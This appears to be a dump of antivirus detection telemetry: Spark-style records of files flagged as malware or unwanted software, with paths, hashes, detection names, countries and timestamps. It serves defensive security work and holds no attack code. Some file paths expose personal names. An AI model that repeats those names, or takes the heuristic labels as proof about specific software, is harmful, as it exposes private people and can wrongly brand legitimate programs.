  Row(detection=Row(filename='instmsia.exe', filepath='\\\\?\\F:\\FOTO_FOTO\\2003\\Foto_dll\\instmsia.exe', filesize=640000, name='W32/Ramnit.C.#M1.#R1'), hash='487ccdcf7f8c760d5d0b13f6da635b329edc3e4486a4867721dda56ca7bb0cbc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:23:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='instmsiw.exe', filepath='\\\\?\\F:\\FOTO_FOTO\\2003\\Foto_dll\\instmsiw.exe', filesize=640000, name='W32/Ramnit.C.#M1.#R1'), hash='487ccdcf7f8c760d5d0b13f6da635b329edc3e4486a4867721dda56ca7bb0cbc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:24:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avcenter.exe', filepath='\\?\\J:\\PROGRAMS\\anty virus\\Avira\\avir  00000\\Avira\\AntiVir PersonalEdition Classic\\avcenter.exe', filesize=512000, name='W32/Sality.#M1.#R1'), hash='0f48ab5f5609abe58fafc6c5f7ad39b751129692bd5ac1e9ba84a32bc4d89b35', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-164118-3be18442', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-164118-3BE18442', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:39:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161537-c71d9c8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161537-C71D9C8C', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:15:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144531-e2106af4', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-141018-1F4A17CE\\AVSCAN-20181104-144531-E2106AF4', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9600a7a82fa27381b6c5a23c81326e60b1b30a39d0b20feb6a066b67ef1ea05e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:45:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-223833-65396b1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8d0565c\\AVSCAN-20181103-223810-61013BFE\\AVSCAN-20181103-223833-65396B1C', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:38:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211139-b0fa16ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-211139-B0FA16AC', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:11:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001928d', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001928d', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130349-f593f9e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130349-F593F9E1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:03:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nseEABB.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/firststart', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\TuneUp Utilities 2014\\OneClick.exe', parentsize=459576, timestamp='2018-11-04T05:44:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024456', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024456', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:52:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-002012-9e455566', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-002012-9E455566', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:49:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eulczjh.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\eulczjh.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:01:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151309-c36eb09c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d880bdd\\AVSCAN-20181104-151117-B1DD74DF\\AVSCAN-20181104-151309-C36EB09C', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:13:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T00:49:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-14-05.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-03T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T12:26:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204638-c6965702', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204638-C6965702', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:46:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:45:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T09:56:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:30:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cam.dll', filepath='\\\\?\\D:\\Pastas da Área de Trabalho\\BATOTA\\59330\\NjRat 0.7d Golden Edition\\Plugin\\cam.dll', filesize=64000, name='HEUR/AGEN.1032945.#M1.#R1'), hash='5f00cda5808e3fd126d452708308ddee6556cb83adaccd02efe83654a40fc641', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:49:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c6ffd4f3e688eaadae948904295007628b26eedfe29c00cbad7cdf3b420b3cd8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C6FFD4F3E688EAADAE948904295007628B26EEDFE29C00CBAD7CDF3B420B3CD8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c6ffd4f3e688eaadae948904295007628b26eedfe29c00cbad7cdf3b420b3cd8', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:59:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205337-12290f2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205337-12290F2A', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:53:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='minecraft (1).exe', filepath='C:\\Users\\X\\Downloads\\Minecraft (1).exe', filesize=976000, name='PUA/InstallCore.Gen7.#M300.#R603246'), hash='66005c7e449fc923dc6cdbd380a778df8c648b4dd56ff12e7915c7aa3901bcd1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-04T10:46:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210219-703e5a29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210219-703E5A29', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:02:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tasurrogate.exe', filepath='\\\\?\\S:\\Backup\\Drives\\LwD\\TMP\\Temp2\\1\\ThinAppPortable\\TASurrogate.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='96fe54fba244c172b9cff7409f0516440c1831efd81ac26c66386fb8a839233a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:09:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='C:\\Program Files (x86)\\agitating\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T18:03:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015dba7', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015dba7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:34:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lg_k350h_pt.htm', filepath='C:\\Program Files (x86)\\Octoplus\\Octoplus_LG\\MANUALS\\LG_K350H_PT.htm', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='479ec0b4e5878b4a73e8687317be6c8b8572a9141e08142f9728b3592c70d731', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T19:10:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Neshta.A.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\Wise.Care.Pro.5.XX\\Activator.exe', parentsize=684032, timestamp='2018-11-04T14:50:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Dokumente und Einstellungen\\Karl\\Lokale Einstellungen\\Temporary Internet Files\\Content.IE5\\L9XLAHBM\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:11:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015dad4', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015dad4', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zzhd918y2jh.exe', filepath='C:\\Program Files (x86)\\Windows Update\\zzhd918y2jh.exe', filesize=1280000, name='HEUR/AGEN.1031465.#M1.#R1'), hash='cc53c0083b2158bb6abafdab0da31474d97548d4a40f33de09f8bac83f8d98e5', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T08:31:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092352-dd3478ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1683e6be\\AVSCAN-20181104-090613-498D57A5\\AVSCAN-20181104-092352-DD3478AC', filesize=832000, name='TR/AD.Nymaim.Y.#M1.#R1'), hash='c9f8f29a621280e52d0e3b601de031b71e4ad683c496060f3ce00b5c5eef2d47', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:24:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8fb5', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8fb5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:33:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_119332d5.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_119332d5.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:06:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-090701-8ed55dba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71a0094a\\AVSCAN-20181102-090621-88C8498C\\AVSCAN-20181102-090701-8ED55DBA', filesize=380000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='81922228b4beba7ed2d0beb28fc10a568be0dc1f26341efa0125a3a2058a9e54', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:07:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hide folders 5.4.2.1155 final.exe', filepath='\\\\?\\D:\\SÜRÜCÜLER\\1-Programlar\\Hide Folders 5.4.2.1155 Final.exe', filesize=4088000, name='SPR/HideFiles.7d3738.#M1.#R1'), hash='7d373857fec856a2525887e85607f261a562b17b1ba3f9cb01f3581181ae246b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:34:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fbzpigxh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\FBZpiGxH.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T02:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nso871D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:33:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FileZilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nzhstrpg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\NZhsTRpg.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mip.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe', filesize=1216000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='e3b879b3bfc0205702388306a9c593f2072f1045b3237a12a3e399184a4cf98d', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\UltimateDefrag.exe", filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D415C15376BECEE5D6BD66250B812FDB9442D814ACE3F61A26F73537FEAB54D', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:05:06Z'), dt=datetime.date(2018, 11, 2)),
